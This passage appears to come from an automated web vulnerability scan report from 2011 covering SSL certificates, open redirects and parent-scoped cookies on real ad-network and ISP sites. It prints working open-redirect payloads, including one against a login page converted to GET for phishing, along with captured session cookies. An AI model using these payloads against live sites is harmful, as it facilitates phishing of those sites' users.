Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

11.7. https://orcres.cosmos.net.nz/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orcres.cosmos.net.nz
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.cosmos.net.nz
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Sun Jun 14 19:36:10 CDT 2009
Valid to:  Tue Jun 14 19:36:10 CDT 2011

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

Certificate chain #4

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

11.8. https://portal.bizoservices.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://portal.bizoservices.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.bizoservices.com
Issued by:  UTN-USERFirst-Hardware
Valid from:  Mon Aug 02 19:00:00 CDT 2010
Valid to:  Wed Aug 03 18:59:59 CDT 2011

Certificate chain #1

Issued to:  UTN-USERFirst-Hardware
Issued by:  AddTrust External CA Root
Valid from:  Tue Jun 07 03:09:10 CDT 2005
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

11.9. https://secure-static.tagged.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure-static.tagged.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.tagged.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Tue Jun 09 16:26:18 CDT 2009
Valid to:  Tue Jul 05 18:58:16 CDT 2011

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Thu Jun 29 12:06:20 CDT 2034

11.10. https://secure.tagged.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.tagged.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.tagged.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Tue Jun 09 16:26:18 CDT 2009
Valid to:  Tue Jul 05 18:58:16 CDT 2011

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Thu Jun 29 12:06:20 CDT 2034

12. Open redirection  previous  next
There are 3 instances of this issue:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:


12.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ru parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the ru request parameter is used to perform an HTTP redirect. The payload http%3a//adc73517902d7a9d8/a%3fhttp%3a//ds.serving-sys.com/BurstingRes//Site-8706/Type-0/2431cb34-cff9-4ab3-9273-74ecfd5a422b.jpg was submitted in the ru parameter. This caused a redirection to the following URL:

Request

GET /BurstingPipe/adServer.bs?cn=cdi&ai=3342702&p=&pi=0&ru=http%3a//adc73517902d7a9d8/a%3fhttp%3a//ds.serving-sys.com/BurstingRes//Site-8706/Type-0/2431cb34-cff9-4ab3-9273-74ecfd5a422b.jpg&ord=32746407266802946 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.orcon.net.nz/work/=&ref=iserve
Cookie: A3=jy8xaLyu0drF00001iCYmaLtc0bnA00002cM5KaNgz0aR600001iN4OaLyu0d9d00000; B3=98IM0000000000uz6rGx0000000001uE9v950000000001uz94DX0000000002uz; u2=e1292900-528b-4d66-83e8-593dd8b9e2433I004g; C4=

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 95
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://adc73517902d7a9d8/a?http://ds.serving-sys.com/BurstingRes//Site-8706/Type-0/2431cb34-cff9-4ab3-9273-74ecfd5a422b.jpg
Server: Microsoft-IIS/7.5
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 15 May 2011 17:23:20 GMT
Connection: close

HTTP://ds.serving-sys.com/BurstingRes/Site-8706/Type-0/2431cb34-cff9-4ab3-9273-74ecfd5a422b.jpg

12.2. http://cmap.am.ace.advertising.com/amcm.ashx [admeld_callback parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cmap.am.ace.advertising.com
Path:   /amcm.ashx

Issue detail

The value of the admeld_callback request parameter is used to perform an HTTP redirect. The payload http%3a//aefdfd3111aa74563/a%3fhttp%3a//tag.admeld.com/match was submitted in the admeld_callback parameter. This caused a redirection to the following URL:

Request

GET /amcm.ashx?admeld_adprovider_id=1&admeld_call_type=redirect&admeld_callback=http%3a//aefdfd3111aa74563/a%3fhttp%3a//tag.admeld.com/match HTTP/1.1
Host: cmap.am.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUACping.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; C2=E0B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=BQQHQ3EBAAAABAAAAMAAgEA; BASE=x7Q9Di23SwnkpMdYS8Ne5ru2BcaVK0B!; ROLL=U6APBje2uuEWubpKMml2fH2mYRDmKrC!

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 15 May 2011 18:44:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Pragma: no-cache
Location: http://aefdfd3111aa74563/a?http://tag.admeld.com/match?admeld_adprovider_id=1&external_user_id=dfEqewWn_DjocekKUPGvGuhGZ-Q&expiration=1308062645
Cache-Control: private, max-age=0, no-cache, max-age=3600
Expires: Sun, 15 May 2011 18:44:05 GMT
Content-Length: 0


12.3. https://orcres.cosmos.net.nz/orconmembersarea.php [failureurl parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://orcres.cosmos.net.nz
Path:   /orconmembersarea.php

Issue detail

The value of the failureurl request parameter is used to perform an HTTP redirect. The payload http%3a//ac6c55bde109bc9c9/a%3fhttp%3a//www.orcon.net.nz/site/login/%3d%26result%3dfailure was submitted in the failureurl parameter. This caused a redirection to the following URL:

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable viable exploitation in a phishing attack.

Request

GET /orconmembersarea.php?username=&password=&failureurl=http%3a//ac6c55bde109bc9c9/a%3fhttp%3a//www.orcon.net.nz/site/login/%3d%26result%3dfailure HTTP/1.1
Host: orcres.cosmos.net.nz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.orcon.net.nz/work/=&ref=iserve

Response

HTTP/1.1 302 Found
Date: Sun, 15 May 2011 17:29:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Location: http://ac6c55bde109bc9c9/a?http://www.orcon.net.nz/site/login/=&result=failure
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html


13. Cookie scoped to parent domain  previous  next
There are 48 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


13.1. http://t.mookie1.com/t/v1/imp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/imp?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1791096;62782476;240287920;41831472&migRandom=2359013&migTrackFmtExt=client;io;ad;crtv HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=safety&t=250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:38:35 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=2814750682866683; path=/; expires=Fri, 08-Jun-12 18:38:35 GMT; domain=.mookie1.com
Set-Cookie: session=1305484715|1305484715; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

13.2. http://www.opensource.org/licenses/gpl-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:38:54 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.16
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=5er1djjd2s63lr1rh2vvchfv73; expires=Tue, 07-Jun-2011 21:12:14 GMT; path=/; domain=.opensource.org
Last-Modified: Sun, 15 May 2011 17:38:54 GMT
ETag: "159583e07d836a01cec54377c803643f"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7276
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

13.3. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:38:56 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.16
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=tndtr8p6iqd7ndif60e5nmkbu4; expires=Tue, 07-Jun-2011 21:12:16 GMT; path=/; domain=.opensource.org
Last-Modified: Sun, 15 May 2011 17:33:14 GMT
ETag: "d4a42fec59b612e477d9d39be04e83be"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

13.4. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PortalServe/?pid=1197387J73320110126233349&flash=10&time=0|13:35|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b08/3/0/%2a/k%3B237711306%3B0-0%3B2%3B58756654%3B4307-300/250%3B40588687/40606474/1%3B%3B%7Eaopt%3D2/1/6b/1%3B%7Esscs%3D%3f$CTURL$&pos=x&r=0.6301347056869417 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6418033024623919&output=html&h=250&slotname=1122094293&w=300&ea=0&flash=10.3.181&url=http%3A%2F%2Fwww.tagged.com%2F&dt=1305484543735&bpp=2&shv=r20110509&jsv=r20110506&correlator=1305484543755&frm=1&adk=2814374565&ga_vid=1669351923.1305484544&ga_sid=1305484544&ga_hid=2114303632&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=-12245933&bih=-12245933&ifk=241114598&fu=0&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:35:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 2385
Set-Cookie:PRID=A32A4853-1E1A-43A8-816D-90F9F42BE2AB; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRbu=Eo1TOtSCI;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRvt=CBJZfEo1TOtSCI!BVBBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAuILBBVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=54A30400-B5CE-8820-1309-65F000550101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKAt*1646:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKAtAA08:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FB4h:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GBnW:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FB4hGBnW:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

13.5. http://amch.questionmarket.com/adscgen/sta.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adscgen/sta.php?survey_num=898849&site=1197387&code=1436872&ut_sys=pointroll HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6418033024623919&output=html&h=250&slotname=1122094293&w=300&ea=0&flash=10.3.181&url=http%3A%2F%2Fwww.tagged.com%2F&dt=1305484543735&bpp=2&shv=r20110509&jsv=r20110506&correlator=1305484543755&frm=1&adk=2814374565&ga_vid=1669351923.1305484544&ga_sid=1305484544&ga_hid=2114303632&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=-12245933&bih=-12245933&ifk=241114598&fu=0&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=40348193-10-1; ES=845473-OaS)M-0

Response

HTTP/1.1 302 Found
Date: Sun, 15 May 2011 18:35:49 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a209.dl
Set-Cookie: CS1=deleted; expires=Sat, 15-May-2010 18:35:48 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=40348193-10-1_898849-1-1; expires=Thu, 05-Jul-2012 10:35:49 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=845473-OaS)M-0_898849-k.h)M-0; expires=Thu, 05-Jul-2012 10:35:49 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=pointroll&survey_num=898849&site=1197387-1197387-&code=1436872
Content-Length: 44
Content-Type: text/html

/* /adsc/d898849/1197387/1436872/randm.js */

13.6. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=7198000&rn=1140352054&c7=http%3A%2F%2Fwww.tagged.com%2F&c4=www.tagged.com%2Findex.html&c15=acfce1cd086cbc82e14401387f64e37ade360744&c8=Tagged&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 15 May 2011 18:35:34 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Tue, 14-May-2013 18:35:34 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


13.7. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=2&c2=6906514&c3=&c4=http%3A%2F%2Fvtr.com%2Findex.html&c5=&c6=&c7=http%3A%2F%2Fvtr.com%2Findex.html&c8=&c9=&c10=CERT&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://vtr.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 15 May 2011 18:23:54 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Tue, 14-May-2013 18:23:54 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

13.8. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=add&advid=2532&token=AMQU1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web80
Set-Cookie: V=tRT1MopEi6hc; Domain=.contextweb.com; Expires=Wed, 09-May-2012 18:35:35 GMT; Path=/
Set-Cookie: cwbh1=2532%3B06%2F14%2F2011%3BAMQU1; Domain=.contextweb.com; Expires=Mon, 18-Apr-2016 18:35:35 GMT; Path=/
Content-Type: image/gif
Date: Sun, 15 May 2011 18:35:34 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

13.9. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/ActivityServer.bs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BurstingPipe/ActivityServer.bs?cn=as&ActivityID=72375&rnd=725398.7372448546 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.orcon.net.nz/work/=&ref=iserve
Cookie: A3=jy8xaLyu0drF00001iCYmaLtc0bnA00002cM5KaNgz0aR600001iN4OaLyu0d9d00000; B3=98IM0000000000uz6rGx0000000001uE9v950000000001uz94DX0000000002uz; u2=e1292900-528b-4d66-83e8-593dd8b9e2433I004g; C4=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: ActivityInfo=000iPlceV%5f; expires=Sat, 13-Aug-2011 13:23:08 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 15 May 2011 17:23:07 GMT
Connection: close
Content-Length: 24

//Conversion Was Written

13.10. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerRedirect.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerRedirect.asp?FlightID=1686177&Page=&PluID=0&Pos=9946 HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eyeblaster=FLV=0&RES=128&WMPV=0; B3=98IM0000000000uz6rGx0000000003uE9v950000000001uz94DX0000000002uz; A3=jy8xaLyu0drF00001iCYmaLtc0bnA00002cM5KaNgA0aR600003iN4OaLyu0d9d00000; C4=; u2=0354b6eb-fc5d-4f2c-b244-3b1b2becc2f03I5020; ActivityInfo=000iPlceU%5f;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://www.orcon.net.nz/business
Server: Microsoft-IIS/7.5
Set-Cookie: A3=jy8xaLyu0drF00001iCYmaLtc0bnA00002iN4OaLyu0d9d00000cM5KaNgL0aR6aNgL4; expires=Sat, 13-Aug-2011 13:35:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=98IM0000000000uz6rGx0000000004uE9v950000000001uz94DX0000000002uz; expires=Sat, 13-Aug-2011 13:35:37 GMT; domain=.serving-sys.com; path=/
